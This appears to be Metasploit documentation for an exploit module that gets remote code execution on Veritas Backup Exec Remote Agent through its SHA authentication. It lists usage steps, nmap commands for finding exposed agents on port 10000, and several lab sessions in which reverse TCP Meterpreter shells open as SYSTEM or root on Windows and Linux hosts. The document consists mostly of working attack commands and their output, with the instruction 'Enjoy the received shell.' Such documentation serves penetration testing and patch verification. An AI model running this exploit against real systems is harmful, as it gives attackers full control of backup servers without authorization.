Grant Willcox
12 KiB
12 KiB
Vulnerable Application
Backup Exec consists of a server component as well as remote agents that are installed on each host that should be backed up by the server.
There are remote agents available for a range of data sources, including
operating-system level agents for Windows and Linux hosts' local filesystems,
application-specific agents for Microsoft Exchange, SharePoint, Active
Directory, etc., and agents for virtual machines such as VMware or Hyper-V
instances. This exploit targets the Windows and Linux OS-level remote agents.
The agents are installed as services running by default with
NT AUTHORITY\SYSTEM or root user rights for Windows and Linux respectively.
Vulnerable Backup Exec Remote Agent versions are 9.3 and below. These agents' versions are distributed with Backup Exec versions 21.1 and below.
A trial version of Backup Exec can be downloaded from Veritas' website. All supported version of Backup Exec is available in Veritas' download center.
Verification Steps
- Download Backup Exec distributive and install Backup Exec Remote Agent on Windows or Linux host.
- Start
msfconsole. - Select the module and set the address of the host running the remote agent:
use exploit/multi/veritas/beagent_sha_auth_rce
set RHOSTS [REMOTE_AGENT_HOST]
- Check the service is running and potentially vulnerable with the
checkcommand. - Set TARGET (Windows or Linux) depending on operating system on the host running the remote agent:
set TARGET [OS_NAME]
- Set and configure preferred payload:
set PAYLOAD [PAYLOAD_NAME]
set LHOST [LOCAL_IP]
set LPORT [LOCAL_PORT]
- If Backup Exec Remote Agent run on the Linux then set preferred interpreter
to execute the command (by default,
/bin/bash). The option does not matter for Windows hosts since the command will always be executed usingC:\Windows\System32\cmd.exe.
set INTERPRETER [INTERPRETER_NAME]
- Start the module using the
exploitcommand. - Enjoy the received shell.
An example session is as follows:
msf6 > use exploit/multi/veritas/beagent_sha_auth_rce
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set rhosts 172.16.180.141
rhosts => 172.16.180.141
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set lhost 172.16.180.248
lhost => 172.16.180.248
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > show options
Module options (exploit/multi/veritas/beagent_sha_auth_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 172.16.180.141 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 10000 yes The target port (TCP)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.16.180.248 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > check
[*] 172.16.180.141:10000 - Checking vulnerability
[*] 172.16.180.141:10000 - Connecting to BE Agent service
[*] 172.16.180.141:10000 - Getting supported authentication types
[*] 172.16.180.141:10000 - Supported authentication by BE agent: BEWS2 (190), SHA (5), SSPI (4)
[*] 172.16.180.141:10000 - BE agent revision: 9.3
[*] 172.16.180.141:10000 - The target appears to be vulnerable. SHA authentication is enabled
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run
[*] Started reverse TCP handler on 172.16.180.248:4444
[*] 172.16.180.141:10000 - Running automatic check ("set AutoCheck false" to disable)
[*] 172.16.180.141:10000 - Checking vulnerability
[*] 172.16.180.141:10000 - Connecting to BE Agent service
[*] 172.16.180.141:10000 - Getting supported authentication types
[*] 172.16.180.141:10000 - Supported authentication by BE agent: BEWS2 (190), SHA (5), SSPI (4)
[*] 172.16.180.141:10000 - BE agent revision: 9.3
[+] 172.16.180.141:10000 - The target appears to be vulnerable. SHA authentication is enabled
[*] 172.16.180.141:10000 - Exploiting ...
[*] 172.16.180.141:10000 - Connecting to BE Agent service
[*] 172.16.180.141:10000 - Enabling TLS for NDMP connection
[*] 172.16.180.141:10000 - Passing SHA authentication
[*] 172.16.180.141:10000 - Uploading payload with NDMP_FILE_WRITE packet
[*] Sending stage (175686 bytes) to 172.16.180.141
[*] Meterpreter session 1 opened (172.16.180.248:4444 -> 172.16.180.141:49629) at 2022-09-23 10:33:42 +0300
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : TEST-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
Options
INTERPRETER
The command line interpreter for executing Linux OS command. By default, the option is
/bin/bash. For Windows the option does not matter and the command will always be
executed using C:\Windows\System32\cmd.exe.
Scenarios
The Backup Exec Remote Agent is installed on each host that has local filesystems that should be backed up. These agents listen on the network for NDMP connections (10000/tcp), appearing in Nmap scans with scripts enabled as follows:
$ nmap -p10000 -n 172.16.180.0/24 --open -vvv
...
Discovered open port 10000/tcp on 172.16.180.133
Discovered open port 10000/tcp on 172.16.180.132
Discovered open port 10000/tcp on 172.16.180.141
...
$ nmap -p10000 -n -sV 172.16.180.133
...
10000/tcp open ndmp Symantec/Veritas Backup Exec ndmp (NDMPv3)
...
(Note that the ndmp-version script fails to execute due to not sending an
NDMP_CONNECT_OPEN request before querying version information with the
NDMP_CONFIG_GET_HOST_INFO request. This exploit module's check command will
carry this query out successfully.)
Windows; Backup Exec 21.0 (Backup Exec Remote Agent, revision 9.3)
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set rhosts 192.168.123.147
rhosts => 192.168.123.147
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run
[*] Started reverse TCP handler on 192.168.123.1:4444
[*] 192.168.123.147:10000 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.123.147:10000 - Checking vulnerability
[*] 192.168.123.147:10000 - Connecting to BE Agent service
[*] 192.168.123.147:10000 - Getting supported authentication types
[*] 192.168.123.147:10000 - Supported authentication by BE agent: BEWS2 (190), SHA (5), SSPI (4)
[*] 192.168.123.147:10000 - BE agent revision: 9.3
[+] 192.168.123.147:10000 - The target appears to be vulnerable. SHA authentication is enabled
[*] 192.168.123.147:10000 - Exploiting ...
[*] 192.168.123.147:10000 - Connecting to BE Agent service
[*] 192.168.123.147:10000 - Enabling TLS for NDMP connection
[*] 192.168.123.147:10000 - Passing SHA authentication
[*] 192.168.123.147:10000 - Uploading payload with NDMP_FILE_WRITE packet
[*] Sending stage (175686 bytes) to 192.168.123.147
[*] Meterpreter session 5 opened (192.168.123.1:4444 -> 192.168.123.147:49835) at 2022-09-22 15:23:19 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-BE1QFC9
OS : Windows 10 (10.0 Build 19041).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.123.147 - Meterpreter session 1 closed. Reason: User exit
Linux; Backup Exec 16.0 (Backup Exec Remote Agent, revision 9.2)
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set rhosts 172.16.199.133
rhosts => 172.16.199.133
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set target 1
target => 1
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] 172.16.199.133:10000 - Running automatic check ("set AutoCheck false" to disable)
[*] 172.16.199.133:10000 - Checking vulnerability
[*] 172.16.199.133:10000 - Connecting to BE Agent service
[*] 172.16.199.133:10000 - Getting supported authentication types
[*] 172.16.199.133:10000 - Supported authentication by BE agent: BEWS2 (190), SHA (5)
[*] 172.16.199.133:10000 - BE agent revision: 9.2
[+] 172.16.199.133:10000 - The target appears to be vulnerable. SHA authentication is enabled
[*] 172.16.199.133:10000 - Exploiting ...
[*] 172.16.199.133:10000 - Connecting to BE Agent service
[*] 172.16.199.133:10000 - Enabling TLS for NDMP connection
[*] 172.16.199.133:10000 - Passing SHA authentication
[*] 172.16.199.133:10000 - Uploading payload with CmdStager
[*] 172.16.199.133:10000 - Command Stager progress - 44.15% done (362/820 bytes)
[*] Sending stage (3020772 bytes) to 172.16.199.133
[*] 172.16.199.133:10000 - Command Stager progress - 100.00% done (820/820 bytes)
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.133:55062) at 2022-09-22 15:17:01 -0400
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : debian.test.com
OS : Debian 9.13 (Linux 4.9.0-19-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > Interrupt: use the 'exit' command to quit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 172.16.199.133 - Meterpreter session 2 closed. Reason: User exit
Windows; Backup Exec 21.2 (Backup Exec Remote Agent, revision 9.4) - NOT VULNERABLE
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > use exploit/multi/veritas/beagent_sha_auth_rce
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set rhosts 172.16.180.135
rhosts => 172.16.180.135
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set lhost 172.16.180.248
lhost => 172.16.180.248
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > check
[*] 172.16.180.135:10000 - Checking vulnerability
[*] 172.16.180.135:10000 - Connecting to BE Agent service
[*] 172.16.180.135:10000 - Getting supported authentication types
[*] 172.16.180.135:10000 - Supported authentication by BE agent: BEWS2 (190), SSPI (4)
[*] 172.16.180.135:10000 - BE agent revision: 9.4
[*] 172.16.180.135:10000 - The target is not exploitable. SHA authentication is disabled
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run
[*] Started reverse TCP handler on 172.16.180.248:4444
[*] 172.16.180.135:10000 - Running automatic check ("set AutoCheck false" to disable)
[*] 172.16.180.135:10000 - Checking vulnerability
[*] 172.16.180.135:10000 - Connecting to BE Agent service
[*] 172.16.180.135:10000 - Getting supported authentication types
[*] 172.16.180.135:10000 - Supported authentication by BE agent: BEWS2 (190), SSPI (4)
[*] 172.16.180.135:10000 - BE agent revision: 9.4
[-] 172.16.180.135:10000 - Exploit aborted due to failure: not-vulnerable: The target is not exploitable. SHA authentication is disabled "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/veritas/beagent_sha_auth_rce) >